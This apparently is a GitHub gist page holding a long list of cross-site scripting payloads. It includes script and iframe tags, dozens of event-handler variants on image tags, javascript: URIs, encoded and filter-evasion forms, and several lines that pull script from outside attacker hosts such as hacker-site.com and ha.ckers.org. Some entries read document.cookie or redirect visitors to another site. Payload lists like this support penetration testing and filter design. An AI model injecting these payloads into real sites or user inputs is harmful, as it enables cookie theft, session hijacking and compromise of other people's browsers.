002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> | |
</body> | |
</html> | |
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> | |
<SCRIPT> alert(“XSS”); </SCRIPT> | |
<BODY ONLOAD=alert("XSS")> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<IFRAME SRC=”http://hacker-site.com/xss.html”> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> | |
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
<SCRIPT>alert('XSS')</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS');"> | |
<BODY ONLOAD=alert('XSS')> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> | |
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<INPUT TYPE="BUTTON" action="alert('XSS')"/> | |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF | |
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> | |
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr | |
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 | |
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> | |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
<iframe src=http://xss.rocks/scriptlet.html < | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<iframe src="	javascript:prompt(1)	"> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt >alert(1) {Opera} | |
<img/src=`` onerror=this.onerror=confirm(1) | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=``
 onerror=alert(1)
 |
<iframe><plaintext><img src=x onerror=Promise.all([document.domain]).then(alert)>
<iframe><details open ontoggle=with(document)prompt(cookie)>
SCRIPT>alert('gotcha');/SCRIPT>
<SCRIPT>alert('gotcha'); </SCRIPT<![CDATA[>>
<script>alert()</script>
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
<iframe><plaintext><img src=x onerror=Promise.all([document.domain]).then(alert)>